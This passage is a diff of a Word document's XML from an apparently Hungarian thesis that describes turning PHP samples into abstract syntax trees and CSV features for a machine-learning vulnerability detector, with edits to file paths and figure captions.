-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">AST generáláson esik át, amihez az irodalomjegyzék [10] elemét használtam. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ez egy manuális folyamat volt, de a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>p</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>arser.js</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a grafikus felület által bekért kódra</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ezt</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> már automatizálja</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> az irodalomjegyzék [11] eleme segítségével</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>A PHP fájl</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">okhoz generált </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST fák</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mappábában </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">közel </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>azonos névvel helyezked</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">nek </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>el</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>txt kiterjesztéssel.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="567"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mappában helyezkedik el</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a gépi tanulási modellem alapja.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15284,430 +15069,10 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67F1A32B" wp14:editId="3C0D88AE">
-            <wp:extent cx="3791145" cy="1847945"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="10" name="Kép 10"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="3791145" cy="1847945"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.2-es ábra: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>pdo1_ast.txt</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a 3.1-es ábra kódjának AST megfelelője</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>nodes</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ezekkel dolgozik tovább</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Elsőként listázza és egy ciklussal sorra </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">beolvassa </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mappa .txt kiterjesztésű fájljait</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>. M</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ajd </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ezek</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>nek</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>JSON felépítésű fájlok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>nak a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sorait kulcsok alapján szelektálja</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> („kind”, „name”, „raw”)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Ezek</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>nek</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>z értéke</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>i</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>adják a fájlok fontos szavait és kifejezéseit</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, így </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>azonos nevű .csv kiterjesztésű fájlok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> első oszlop</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>aiba</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> írja</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>az értékeket</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>listá</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>k</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ba fűzve.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D80A38E" wp14:editId="1B0F2926">
-            <wp:extent cx="5156465" cy="495325"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D7EF8D3" wp14:editId="4B1C992F">
+            <wp:extent cx="3194214" cy="482625"/>
             <wp:effectExtent l="0" t="0" r="6350" b="0"/>
-            <wp:docPr id="15" name="Kép 15"/>
+            <wp:docPr id="9" name="Kép 9"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -15727,7 +15092,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5156465" cy="495325"/>
+                      <a:ext cx="3194214" cy="482625"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -15743,7 +15108,6 @@
     <w:p>
       <w:pPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="567"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15753,78 +15117,47 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>3.3-as ábra</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>pdo1_ast.csv</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, a nodes.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>kimenete, a 3.2-es ábra bemenetre</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="567"/>
+        <w:t>3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-es ábra: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>pdo1.php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, egy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> nem sérülékeny kód</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a tanulo_adatok mappában</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -15844,163 +15177,133 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> következő lépésben a .csv fájlokat </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>fűzöm</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> össze</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
+        <w:t>Az</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 57 darab sérülékeny és 45 darab nem sérülékeny kó</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> legelső lépésben </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">AST generáláson esik át, amihez az irodalomjegyzék [10] elemét használtam. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ez egy manuális folyamat volt, de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a parser.js a grafikus felület által bekért kódra</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ezt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> már automatizálja</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> az irodalomjegyzék [11] eleme segítségével</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A PHP fájl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">okhoz generált </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>AST fák</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>AST</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>concatenate.py</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> által</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>concatenate</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>d.csv fájlba</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, majd </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">manuálisan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>felcímkézem őket</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>nnak duplikáltjában, a</w:t>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mappábában </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">közel </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>azonos névvel helyezked</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nek </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>el</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -16010,110 +15313,6 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\machine_learning_app\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>tanulo_adatok</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>AST</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
